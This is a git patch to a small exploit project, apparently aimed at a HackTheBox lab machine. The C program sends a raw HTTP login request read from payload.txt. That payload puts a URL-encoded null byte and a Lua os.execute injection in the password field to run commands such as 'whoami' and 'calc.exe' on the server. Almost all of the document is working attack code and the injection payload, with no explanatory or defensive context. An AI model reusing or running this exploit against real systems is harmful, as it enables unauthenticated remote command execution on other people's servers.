From 194309a3bfa14f3f8b4053c052307875b41d0392 Mon Sep 17 00:00:00 2001
From: hexplor <hexplor@hexplor.com>
Date: Sat, 25 Apr 2026 22:22:27 +0200
Subject: [PATCH] upate

---
 Makefile    |  4 ++--
 exploit.c   | 30 +++++++++++++++++-------------
 payload.txt |  3 +--
 3 files changed, 20 insertions(+), 17 deletions(-)

diff --git a/Makefile b/Makefile
index 96c8587..ac95572 100644
--- a/Makefile
+++ b/Makefile
@@ -1,7 +1,7 @@
 EXEC = exploit
 
 $(EXEC): exploit.o
-	gcc -o $(EXEC) exploit.o
+	gcc -g -o $(EXEC) exploit.o
 
 exploit.o: exploit.c
-	gcc -c exploit.c
+	gcc -g -c exploit.c
diff --git a/exploit.c b/exploit.c
index 4202577..fd96b78 100644
--- a/exploit.c
+++ b/exploit.c
@@ -21,29 +21,33 @@ int main(int argc, char** argv){
   dest_addr.sin_port = htons(80);
   dest_addr.sin_addr.s_addr = inet_addr(argv[1]);
 
-
   int ret = connect(fd,(struct sockaddr*)&dest_addr, sizeof(dest_addr));
   printf("ret_connect = %d\n", ret);
 
   char buffer[100];
   memset(buffer, 0, 100);
+  
+  FILE* fichier_out = fopen("payload.txt", "r");
+  fseek(fichier_out, 0, SEEK_END);
 
-  strncpy(buffer, "GET /login.html HTTP/1.1\r\n", 100);
-  send(fd, buffer, strlen(buffer), 0);
-
-  strncpy(buffer, "Host: ftp.wingdata.htb\r\n", 100);
-  send(fd, buffer, strlen(buffer), 0);
-
-  strncpy(buffer, "Accept: */*\r\n", 100);
-  send(fd, buffer, strlen(buffer), 0);
-
-  strncpy(buffer, "\r\n", 100);
-  send(fd, buffer, strlen(buffer), 0);
-
+  
+  int size = fichier_out->_offset;
+  char*	file_buffer = malloc(size);
+  fseek(fichier_out, 0, SEEK_SET);
+  fread(file_buffer, 1, size, fichier_out);
+  for (int i = 0; i < size; i++){
+	  char	c = file_buffer[i];
+	  if (c == '\n')
+		  send(fd, "\r\n", 2, 0);
+	  else
+		  send(fd, &c, 1, 0);
+  }
+  send(fd, "\r\n", 2, 0);
   int n;
   while (( n = recv(fd, buffer, 99, 0)) > 0){
 	  buffer[n] = 0;
 	  printf("%s", buffer);
   }
+  fclose(fichier_out);
   return 0;
 }
diff --git a/payload.txt b/payload.txt
index 6467535..fd9e145 100644
--- a/payload.txt
+++ b/payload.txt
@@ -12,5 +12,4 @@ Referer: http://ftp.wingdata.htb/login.html
 Accept-Encoding: gzip, deflate, br
 Cookie: client_lang=french
 Connection: keep-alive
-
-username=anonymous&password=anonymous%2500%5D%5D+os.execute%28%27calc.exe%27%29+--&username_val=anonymous&password_val=anonymous%2500%5D%5D+os.execute%28%27calc.exe%27%29+--
+username=anonymous&password=anonymous%2500%5D%5D+os.execute%28%27whoami%27%29+--&username_val=anonymous&password_val=anonymous%2500%5D%5D+os.execute%28%27calc.exe%27%29+--